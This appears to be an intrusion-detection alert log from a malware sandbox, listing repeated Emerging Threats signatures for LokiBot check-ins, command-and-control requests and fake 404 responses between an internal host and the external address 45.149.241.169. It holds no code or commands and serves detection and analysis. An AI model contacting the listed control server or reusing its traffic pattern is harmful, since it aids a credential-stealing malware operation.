2024-10-03T09:21:33.526238+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:33.526238+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:35.071052+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:35.071052+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:35.071224+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49751	TCP
2024-10-03T09:21:35.225314+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:35.225314+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:35.225314+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:36.957061+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:36.957061+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:37.121380+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:37.121380+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:37.121380+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:42.165335+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:42.165335+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:42.317761+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:42.317761+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:42.317761+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.028732+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.028732+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.033644+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49754	TCP
2024-10-03T09:21:43.182438+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:43.182438+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:43.182438+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:43.857914+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:43.857914+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:43.862811+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49755	TCP
2024-10-03T09:21:44.019040+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.019040+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.019040+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.832028+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.832028+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.836889+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49756	TCP
2024-10-03T09:21:44.999700+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:44.999700+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:44.999700+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:45.677355+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:45.677355+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:45.682178+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49757	TCP
2024-10-03T09:21:45.841003+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:45.841003+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:45.841003+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:46.484782+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:46.484782+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:46.489748+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49758	TCP
2024-10-03T09:21:46.640569+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:46.640569+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:46.640569+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:47.380324+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:47.380324+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:47.385173+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49759	TCP
2024-10-03T09:21:47.539146+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:47.539146+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:47.539146+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:48.314653+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:48.314653+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:48.319408+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49760	TCP
2024-10-03T09:21:48.485570+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:48.485570+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:48.485570+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:49.257250+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:49.257250+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:49.262105+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49761	TCP
2024-10-03T09:21:50.351787+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:50.351787+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:50.351787+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.015102+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.015102+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.019960+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49762	TCP
2024-10-03T09:21:51.167462+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:51.167462+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:51.167462+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:51.932714+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:51.932714+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:51.937810+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49763	TCP
2024-10-03T09:21:52.087418+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.087418+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.087418+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.836195+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.836195+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.840992+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49764	TCP
2024-10-03T09:21:52.996562+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:52.996562+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:52.996562+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:53.876769+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:53.876769+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:53.882422+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49765	TCP
2024-10-03T09:21:54.039701+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.039701+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.039701+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.813087+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.813087+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.819508+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49766	TCP
2024-10-03T09:21:54.984252+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:54.984252+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:54.984252+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:55.759857+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:55.759857+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:55.764891+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49767	TCP
2024-10-03T09:21:55.928869+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:55.928869+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:55.928869+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:57.049364+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:57.049364+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:57.079321+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49768	TCP
2024-10-03T09:21:57.209847+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:57.209847+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:57.209847+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:58.038305+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:58.038305+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:58.045547+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49769	TCP
2024-10-03T09:21:58.212197+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:58.212197+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:58.212197+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:59.153854+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:59.153854+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:59.158748+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49770	TCP
2024-10-03T09:21:59.314369+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:21:59.314369+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:21:59.314369+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:00.071903+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:00.071903+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:00.077875+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49771	TCP
2024-10-03T09:22:00.225165+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:00.225165+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:00.225165+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:01.204157+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:01.204157+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:01.217841+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49772	TCP
2024-10-03T09:22:01.533864+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:01.533864+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:01.533864+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:02.272358+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:02.272358+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:02.282362+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49773	TCP
2024-10-03T09:22:02.438719+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:02.438719+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:02.438719+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:03.139465+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:03.139465+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:03.145936+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49774	TCP
2024-10-03T09:22:03.295902+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:03.295902+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:03.295902+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:08.044529+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:08.044529+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:08.197130+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:08.197130+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:08.197130+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:09.292301+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:09.292301+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:09.449762+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:09.449762+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:09.449762+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:10.319663+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:10.319663+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:10.325677+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49777	TCP
2024-10-03T09:22:10.502964+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:10.502964+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:10.502964+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:11.228003+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:11.228003+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:11.233316+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49778	TCP
2024-10-03T09:22:11.390993+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:11.390993+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:11.390993+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:12.130536+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:12.130536+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:12.139820+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49779	TCP
2024-10-03T09:22:12.289773+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:12.289773+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:12.289773+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:13.083005+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:13.083005+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:13.088045+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49780	TCP
2024-10-03T09:22:13.260240+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:13.260240+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:13.260240+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:14.029913+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:14.029913+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:14.035809+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49781	TCP
2024-10-03T09:22:14.183320+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:14.183320+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:14.183320+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:15.259916+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:15.259916+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:15.264706+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49782	TCP
2024-10-03T09:22:15.428230+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:15.428230+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:15.428230+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:16.293625+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:16.293625+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:16.298895+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49783	TCP
2024-10-03T09:22:16.459230+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:16.459230+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:16.459230+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:18.382621+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:18.382621+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:18.387415+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49784	TCP
2024-10-03T09:22:18.541296+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:18.541296+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:18.541296+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.163958+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49785	45.149.241.169	80	TCP
